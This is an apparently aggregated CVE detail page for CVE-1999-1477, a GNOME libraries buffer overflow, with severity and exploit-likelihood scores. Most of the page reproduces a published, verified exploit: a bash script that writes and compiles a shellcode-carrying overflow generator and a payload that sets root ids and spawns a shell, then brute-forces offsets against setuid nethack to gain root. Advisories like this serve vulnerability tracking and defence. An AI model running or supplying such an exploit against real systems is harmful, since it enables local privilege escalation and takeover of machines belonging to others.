CVE-1999-1477 : Detail

EPSS score: 0.05% (EPSS v3)
Attack vector: Local
Published: 2001-09-12 02h00 +00:00
Last updated: 2024-08-01 17h18 +00:00

CVE Descriptions

Buffer overflow in GNOME libraries 1.0.8 allows a local user to gain root access via a long --espeaker argument in programs such as nethack.

CVE Information

Metrics

CVSS version: V2
Score: 7.2
Severity: High
CVSS Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Source: [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares the EPSS score of one CVE with the scores of all others.

Exploit information

Exploit Database EDB-ID : 19512

Publication date : 1999-09-25 22h00 +00:00
Author : Brock Tellier
EDB Verified : Yes

source: https://www.securityfocus.com/bid/663/info

A buffer overflow vulnerability in the GNOME shared libraries' handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access. Calling a program linked against GNOME with the command line arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow. One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'. It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable.

#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so. Hence the shell script.
#
# This should work against any su/gid GNOME program. The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier [email protected]

echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<EOF
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFSIZ at 90 and only modify your offset
 *
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */

char gnoshell[]=   /* Generic Linux x86 shellcode modified to run our program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";

#define LEN 120
#define BUFLEN 90          /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

/* returns the current stack pointer (32-bit x86 only) */
unsigned long get_sp(void)
{
  __asm__("movl %esp, %eax");
}

void main(int argc, char *argv[])
{
  int offset, i;
  int buflen = BUFLEN;
  long int addr;
  char buf[BUFLEN];
  char gnobuf[LEN];

  if(argc > 2) {
    fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
    exit(0);
  }
  else if (argc == 2){
    offset=atoi(argv[1]);
  }
  else {
    offset=DEFAULT_OFFSET;
  }

  addr=get_sp();

  fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
  fprintf(stderr, "Brock Tellier [email protected]\n\n");
  fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset, buflen, offset);

  /* NOP sled, shellcode at offset 35, then the guessed return address repeated */
  memset(buf,NOP,buflen);
  memcpy(buf+35,gnoshell,strlen(gnoshell));

  for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
    *(int *)&buf[i]=addr-offset;

  /* buf carries no NUL terminator; %s relies on a zero byte following it on the stack */
  sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);

  for(i=0;i<strlen(gnobuf);i++)
    putchar(gnobuf[i]);
}
EOF
echo "...done!"

echo "Building /tmp/gn.c..."
cat > /tmp/gn.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* payload run by the shellcode: make the effective (root) ids real, then spawn a shell */
void main()
{
  printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n",
         getuid(), geteuid(), getgid(), getegid());
  setreuid(geteuid(), geteuid());
  setregid(getegid(), getegid());
  printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n",
         getuid(), geteuid(), getgid(), getegid());
  system("/bin/bash");
}
EOF
echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"
echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."
offset=0
while [ $offset -lt 10000 ]; do
  /usr/games/nethack `/tmp/gnox $offset`
  offset=`expr $offset + 4`
done
echo "...done!"

Products Mentioned

Configuration 0

Gnome >> Gnome_libs >> Version 1.0.8

Configuration 0

Mandrakesoft >> Mandrake_linux >> Version 6.0

References

http://www.securityfocus.com/bid/663
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/28717
Tags : mailing-list, x_refsource_BUGTRAQ